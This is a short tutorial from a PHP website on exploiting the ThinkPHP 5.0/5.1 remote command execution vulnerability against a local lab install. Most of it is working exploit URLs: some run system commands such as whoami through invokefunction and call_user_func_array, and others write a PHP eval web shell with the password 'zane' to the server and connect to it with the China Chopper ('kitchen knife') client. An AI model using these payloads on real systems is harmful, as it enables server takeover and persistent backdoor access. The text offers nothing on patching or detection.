The following is the thinkphp framework tutorial column to introduce you to ThinkPHP vulnerability exploitation. I hope it will be helpful to friends in need!
thinkphp_5x_Command Execution Vulnerability
Affected versions include 5.0 and 5.1 versions
Docker vulnerability environment source code: https://github.com/vulnspy/thinkphp-5.1.29
Local environment setup:
thinkphp5.0.15 php5.6n apache2.0http://www.thinkphp.cn/donate/download/id/1125.html
EXP http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
EXP:http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index .php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST["zane"])?^>>shell.php 或者 http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=FUCK<?php @eval($_POST["zane"])?>
Connect using a kitchen knife
`
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/shell.php The password is zane
http://127.0.0.1/middleware/thinkphp_5.0.15_full/ test.php Password is zane
`
The above is the detailed content of About ThinkPHP vulnerability exploitation. For more information, please follow other related articles on the PHP Chinese website!
![[Web front-end] Node.js quick start](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
